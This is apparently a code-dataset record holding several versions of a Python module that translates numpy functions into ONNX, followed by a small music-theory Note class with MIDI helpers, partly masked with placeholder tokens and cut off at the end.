tanh transpose'\n .split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-4": "<mask token>\nimport inspect\nimport ast\nfrom textwrap import dedent\nimport numpy\nfrom scipy.spatial.distance import squareform, pdist\nfrom .node_visitor_translator import CodeNodeVisitor\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\ndef squareform_pdist(X, metric='sqeuclidean', op_version=None):\n \"\"\"\n Replacements for `squareform\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_\n and `pdist\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.\n \"\"\"\n return squareform(pdist(X, metric=metric))\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp, 'cdist': 'cdist',\n 'squareform_pdist': 'squareform_pdist'}\n allow = set(\n 'abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divideequal exp floor greater invert less log matmul maximum minimum modmultiply power sign sin sinh sqrt square subtract tan tanh transpose'\n .split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-5": "\"\"\"\n@file\n@brief One class which visits a syntax tree.\n\"\"\"\nimport inspect\nimport ast\nfrom textwrap import dedent\nimport numpy\nfrom scipy.spatial.distance import squareform, pdist\nfrom .node_visitor_translator import CodeNodeVisitor\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\ndef squareform_pdist(X, metric='sqeuclidean', op_version=None):\n \"\"\"\n Replacements for `squareform\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_\n and `pdist\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.\n \"\"\"\n return squareform(pdist(X, metric=metric))\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp,\n 'cdist': 'cdist', 'squareform_pdist': 'squareform_pdist'}\n allow = set(('abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divide'\n 'equal exp floor greater invert less log matmul maximum minimum mod'\n 'multiply power sign sin sinh sqrt square subtract tan tanh transpose').split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array,\n 'py_pow': py_pow, 'py_mul': py_mul, 'py_opp': py_opp,\n 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist # delayed\n from skl2onnx.algebra.complex_functions import onnx_cdist # delayed\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError: # pragma: no cover\n # Too old version for skl2onnx.\n pass\n\n from skl2onnx.algebra import onnx_ops # delayed\n from skl2onnx.algebra.onnx_operator import OnnxOperator # delayed\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith(\"Onnx\") and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError( # pragma: no cover\n f\"Issue with {k}={v} (type={type(v)})\") from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False,\n context_cpl=None, output_names=None,\n dtype=numpy.float32,\n verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {} # pragma: no cover\n try:\n obj = compile(code, \"\", \"exec\")\n except SyntaxError as e: # pragma: no cover\n raise SyntaxError(f\"Unable to compile\\n{code}\") from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l) # pylint: disable=W0122\n return context_l[name]\n\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError( # pragma: no cover\n f\"Unable to guess code from type {type(fct)}.\")\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context,\n output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None: # pragma: no cover\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
from random import shuffle, choice
from typing import Dict, List, Tuple
note_to_midi: Dict[int, int] = {
1: 0,
2: 2,
3: 4,
4: 5,
5: 7,
6: 9,
7: 11,
}
midi_to_note: Dict[int, int] = {
0: 1,
2: 2,
4: 3,
5: 4,
7: 5,
9: 6,
11: 7,
}
class Note:
num: int
@classmethod
def choice(cls, *args: int):
return Note(choice(args))
@classmethod
def from_midi(cls, midi: int, root: int):
note = midi_to_note.get(midi % root)
if isinstance(note, int):
return cls(note)
raise ValueError()
def __init__(self, num: int):
while num > 7:
num -= 7
while num <= 0:
num += 7
self.num = num
def __int__(self):
return self.num
def __repr__(self):
return str(self.num)
def __str__(self):
return f'Note: {self.num}'
def __hash__(self):
return hash(self.num)
def _distance(self, other):
if isinstance(other, Note):
return self.num - other.num
raise TypeError()
def __eq__(self, other):
return self._distance(other) == 0
def __lt__(self, other):
return self._distance(other) < 0
def __le__(self, other):
return self._distance(other) <= 0
def __gt__(self, other):
return self._distance(other) > 0
def __ge__(self, other):
return self._distance(other) >= 0
def _get_interval(self, interval: int):
return {Note(self.num - interval), Note(self.num + interval)}
def get_unison(self):
return self._get_interval(0)
def get_second(self):
return self._get_interval(1)
def get_thirds(self):
return self._get_interval(2)
def get_forth(self):
return self._get_interval(3)
def get_fifth(self):
return self._get_interval(4)
def get_sixth(self):
return self._get_interval(5)
def get_seventh(self):
return self._get_interval(6)
def inv(self):
return Note(6 - self.num)
def get_next_possible_notes(self, /, leap=True):
ret = [Note(self.num - 1), Note(self.num + 1)]
if leap:
ret += [Note(self.num - 2), Note(self.num + 2)]
shuffle(ret)
return ret
def __sub__(self, other) -> int:
dist = abs(self._distance(other))
if dist > 3:
dist = 7 - dist
return dist
def get_all_possible_midi(self, root: int) -> List[int]:
midi = self.convert_to_midi(root)
assert midi >= 0
ret: List[int] = []
while midi - 12 >= 0:
midi -= 12
while midi <= 127:
ret.append(midi)
midi += 12
return ret
def convert_to_midi(self, root: int) -> int:
return note_to_midi[self.num] + root
INVERSE_POSSIBLE_NOTE = {
Note(2), Note(3), Note(4),
}
def choose_from_inverse_possible_note():
return choice(list(INVERSE_POSSIBLE_NOTE))
ALL_NOTES = {
Note(1), Note(2), Note(3), Note(4), Note(5), Note(6), Note(7),
}
def choose_from_all_notes():
return choice(list(ALL_NOTES))
def fill_in_thirds() -> Tuple[Note, Note]:
first = choice(list(ALL_NOTES))
second = choice(list(first.get_thirds()))
return first, second
|
normal
|
{
"blob_id": "d70f77713abf4b35db9de72c1edbf4bf4580b2a4",
"index": 8795,
"step-1": "<mask token>\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n <mask token>\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n <mask token>\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n <mask token>\n\n def __sub__(self, other) ->int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) ->List[int]:\n midi = self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) ->int:\n return note_to_midi[self.num] + root\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n <mask token>\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n\n def get_thirds(self):\n return self._get_interval(2)\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n\n def get_next_possible_notes(self, /, leap=True):\n ret = [Note(self.num - 1), Note(self.num + 1)]\n if leap:\n ret += [Note(self.num - 2), Note(self.num + 2)]\n shuffle(ret)\n return ret\n\n def __sub__(self, other) ->int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) ->List[int]:\n midi = self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) ->int:\n return note_to_midi[self.num] + root\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n\n def __int__(self):\n return self.num\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n\n def get_thirds(self):\n return self._get_interval(2)\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n\n def get_next_possible_notes(self, /, leap=True):\n ret = [Note(self.num - 1), Note(self.num + 1)]\n if leap:\n ret += [Note(self.num - 2), Note(self.num + 2)]\n shuffle(ret)\n return ret\n\n def __sub__(self, other) ->int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) ->List[int]:\n midi = 